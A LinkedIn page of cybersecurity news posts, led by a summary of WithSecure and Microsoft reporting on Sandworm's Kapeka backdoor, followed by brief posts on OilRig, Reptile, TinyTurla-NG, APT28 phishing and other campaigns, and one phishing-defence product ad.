🔴 A previously undocumented "flexible" backdoor called #Kapeka has been "sporadically" observed in cyber attacks targeting Eastern Europe, including #Estonia and #Ukraine, since at least mid-2022. 🔘 The findings come from Finnish cybersecurity firm WithSecure, which attributed the malware to the Russia-linked advanced persistent threat (APT) group tracked as #Sandworm (aka APT44 or Seashell Blizzard). Microsoft is tracking the same #malware under the name #KnuckleTouch. 🔘 “The malware [...] is a flexible backdoor with all the necessary functionalities to serve as an early-stage toolkit for its operators, and also to provide long-term access to the victim estate," security researcher Mohammad Kazem Hassan Nejad said. 🔘 Kapeka comes fitted with a dropper that's designed to launch and execute a backdoor component on the infected host, after which it removes itself. The dropper is also responsible for setting up persistence for the backdoor either as a scheduled task or autorun #registry, depending on whether the process has #SYSTEM privileges. 🔘 Microsoft, in its own advisory released in February 2024, described Kapeka as involved in multiple campaigns distributing ransomware and that it can be used to carry out a variety of functions, such as stealing credentials and other data, conducting destructive #attacks, and granting #threat actors #remote #access to the #device. 🔘 The backdoor is a Windows DLL written in C++ and features an embedded command-and-control (C2) configuration that's used to establish contact with an actor-controlled server and holds information about the frequency at which the server needs to be polled in order to retrieve commands. 🔘 Besides masquerading as a #Microsoft Word add-in to make it appear genuine, the backdoor DLL gathers information about the compromised host and implements multi-threading to fetch incoming instructions, process them, and exfiltrate the results of the execution to the C2 #server. 🔘 "The backdoor uses #WinHttp 5.1 COM interface (winhttpcom.dll) to implement its network communication component," Nejad explained. "The backdoor communicates with its C2 to poll for tasks and to send back fingerprinted information and task results. The backdoor utilizes #JSON to send and receive information from its C2." 🔘 The implant is also capable of updating its C2 configuration on-the-fly by receiving a new version from the C2 server during polling. Some of the main features of the backdoor allow it to read and write files from and to #disk, launch payloads, execute shell commands, and even upgrade and uninstall itself. 🔘 The exact method through which the malware is propagated is currently unknown. However, Microsoft noted that the dropper is retrieved from compromised websites using the certutil utility, underscoring the use of a #legitimate living-off-the-land binary (LOLBin) to orchestrate the #attack. #rcc #cybersecurity #cyberintelligence #cybercrime #alert
România Cyber Center’s Post
More Relevant Posts
-
The Iranian state-sponsored threat actor known as OilRig deployed three different downloader malware throughout 2022 to maintain persistent access to victim organizations located in Israel. The three new downloaders have been named ODAgent, OilCheck, and OilBooster by Slovak cybersecurity company ESET. The attacks also involved the use of an updated version of a known OilRig downloader
To view or add a comment, sign in
-
"Reptile Rootkit: A Sophisticated Linux Malware Targeting Systems in South Korea" In recent events, threat actors have been observed utilizing an open-source #rootkit named "#Reptile" to target Linux-based systems in South Korea. According to a report published by the #AhnLab Security Emergency Response Center (#ASEC), Reptile distinguishes itself from other rootkit #malware by offering an additional capability - a reverse shell, which allows the attackers to assume control over the compromised systems. One noteworthy feature employed by Reptile is "port knocking," a technique where the malware opens a specific port on the infected system and enters a standby mode. Subsequently, when the threat actors transmit a special "magic packet" to the system, it serves as a trigger to establish a connection with the Command and Control (C&C) #server. #Rootkits are malicious software programs specifically designed to grant unauthorized and privileged access to a machine at the root level while effectively concealing their existence from detection. Since 2022, Reptile has been associated with at least four distinct campaigns, highlighting its growing prevalence and significance in cyber threats targeting Linux environments in South Korea. #cybersharks #itnews #informationsecurity #cybernews #hacker #ethicalhacker source: https://lnkd.in/dZjmvwVm
Reptile Rootkit: Advanced Linux Malware Targeting South Korean Systems
thehackernews.com
To view or add a comment, sign in
-
Cyber Security Analyst | Security + | Splunk ES | IBM QRadar | CrowdStrike | SentinelOne | Proofpoint | Armis Cyber Defense Core |
A Russia-linked threat group known as Turla has infected a European non-governmental organization (NGO) with a backdoor called TinyTurla-NG. The attack occurred in October 2023, with data exfiltration taking place in January 2024.The same malware was previously used in a cyber attack on a Polish NGO, indicating highly targeted activity. Turla used various techniques, such as creating exclusions in antivirus products and utilizing the Chisel tunneling software, to evade detection and maintain persistence. The exact method of intrusion is still under investigation #soc #socanalyst #securityoperationscenter #cybersecurityanalyst #cybersecuritynews #malware #cyberattacks #micorsoft #vulnerability #securityawareness #Cisco #redteam #blueteam #applenews #googlecybersecurity #google #apple #ios #osint
Russia Hackers Using TinyTurla-NG to Breach European NGO's Systems
thehackernews.com
To view or add a comment, sign in
-
The Iranian state-sponsored threat actor known as OilRig deployed three different downloader malware throughout 2022 to maintain persistent access to victim organizations located in Israel. The three new downloaders have been named ODAgent, OilCheck, and OilBooster by Slovak cybersecurity company ESET. The attacks also involved the use of an updated version of a known OilRig downloader... Read more on the following blog article!
Iranian State-Sponsored OilRig Group Deploys 3 New Malware Downloaders
thehackernews.com
To view or add a comment, sign in
-
The Iranian state-sponsored threat actor known as OilRig deployed three different downloader malware throughout 2022 to maintain persistent access to victim organizations located in Israel. The three new downloaders have been named ODAgent, OilCheck, and OilBooster by Slovak cybersecurity company ESET. The attacks also involved the use of an updated version of a known OilRig downloader
Iranian State-Sponsored OilRig Group Deploys 3 New Malware Downloaders
thehackernews.com
To view or add a comment, sign in
-
I specialize in reducing a company's cyber risk ✦ In Pursuit of Excellence ✦ Cybersecurity Professional ✦ Qualys Certified Specialist ✦ PCI DSS Compliance Specialist ✦ Desktop Advanced Support Expert ✦ GRC ✦ USAF Veteran
🛑 The infamous Russian hacking collective, known as APT28, is now using a legitimate Microsoft Windows feature to deploy infostealers and other malware to their victims. A new paper from IBM’s cybersecurity arm, X-Force claims the campaign has been active between November last year, and February this year. As per the report, the attackers (also known as Fancy Bear, Forest Blizzard, or ITG05) are impersonating government and NGO organizations in Europe, South Caucasus, Central Asia, and North and South America, reaching out to their victims via email. The emails contain weaponized PDF files. The PDFs come with URLs that lead to compromised websites, which can abuse the “search-ms:” URI protocol handler, as well as the “search:” application protocol. The handler allows apps and HTML links to launch custom local searches on a device, whale the protocol serves as a mechanism for calling the desktop search application on Windows. As a result, the victims end up performing searches on an attacker-controlled server, and coming up with malware displayed in Windows Explorer. This malware is disguised as a PDF file, which the victims are invited to download and run. The malware is hosted on WebDAV servers which themselves are most likely hosted on compromised Ubiquiti routers. These routers were part of a botnet what was apparently taken down by the U.S. government last month, The Hacker News reports. We don’t know who the victims are, but it’s safe to assume they’re from the same countries as the government and NGO agencies being impersonated in the attacks: Argentina, Ukraine, Georgia, Belarus, Kazakhstan, Poland, Armenia, Azerbaijan, and the U.S. #russian #hackers #microsoft #windows #cybersecurity #malware
Russian hacker group exploits Microsoft Windows feature in worldwide phishing attack
techradar.com
To view or add a comment, sign in
-
Iranian State-Sponsored OilRig Group Deploys 3 New Malware Downloaders: The Iranian state-sponsored threat actor known as OilRig deployed three different downloader malware throughout 2022 to maintain persistent access to victim organizations located in Israel. The three new downloaders have been named ODAgent, OilCheck, and OilBooster by Slovak cybersecurity company ESET. The attacks also involved the use of an updated version of a known OilRig downloader
Iranian State-Sponsored OilRig Group Deploys 3 New Malware Downloaders
thehackernews.com
To view or add a comment, sign in
-
"The infamous Russian hacking collective, known as APT28, is now using a legitimate Microsoft Windows feature to deploy infostealers and other malware to their victims. The attackers (also known as Fancy Bear, Forest Blizzard, or ITG05) are impersonating government and NGO organizations in Europe, South Caucasus, Central Asia, and North and South America, reaching out to their victims via email. The emails contain weaponized PDF files." It's critical that you arm your employees - and your security team - with the tools they need to STOP phishing attacks before they happen. It's time for PhishCloud Inc. PhishCloud arms employees with the tools they need to clearly spot and avoid #phishingattacks, across all digital platforms – not just email – letting them Click with Confidence. PhishCloud gives your security team the real-time visibility and control they need to see and block #phishing attacks your employees see. And with real-time metrics, you no longer need to rely on simulations and reporting to understand your phishing risk. And PhishCloud delivers reality-based training that imparts real knowledge, not just awareness. Sound too good to be true? Let us show you the power of PhishCloud Inc. Book a 15-minute demo at PhishCloud Inc. #technology #innovation #informationsecurity #phishingattackprevention https://lnkd.in/eus2Sjc4
Russian hacker group exploits Microsoft Windows feature in worldwide phishing attack
techradar.com
To view or add a comment, sign in
-
Targets located in Azerbaijan have been singled out as part of a new campaign that's designed to deploy Rust-based malware on compromised systems. Cybersecurity firm Deep Instinct is tracking the operation under the name Operation Rusty Flag. It has not been associated with any known threat actor or group. "The operation has at least two different initial access vectors," security researchers... Read more on the following blog article!
Operation Rusty Flag: Azerbaijan Targeted in New Rust-Based Malware Campaign
thehackernews.com
To view or add a comment, sign in
-
Carderbee Attacks: Hong Kong Organizations Targeted via Malicious Software Updates An attack on a software supply chain that targeted businesses primarily in Hong Kong and other parts of Asia has been linked to a previously unreported threat cluster. Under the insect-themed alias Carderbee, the Broadcom subsidiary Symantec Threat Hunter Team is monitoring the behavior. According to the cybersecurity company, the assaults use a trojanized version of the legitimate program EsafeNet Cobra DocGuard Client to install PlugX (also known as Korplug), a known backdoor, on the target networks. Reference from https://lnkd.in/djraXDeM #hongkong #cyberattack #threathunting #trojan Cyber Sleuths Cyber Security Association of India #backdoor #networking
Carderbee Attacks: Hong Kong Organizations Targeted via Malicious Software Updates
thehackernews.com
To view or add a comment, sign in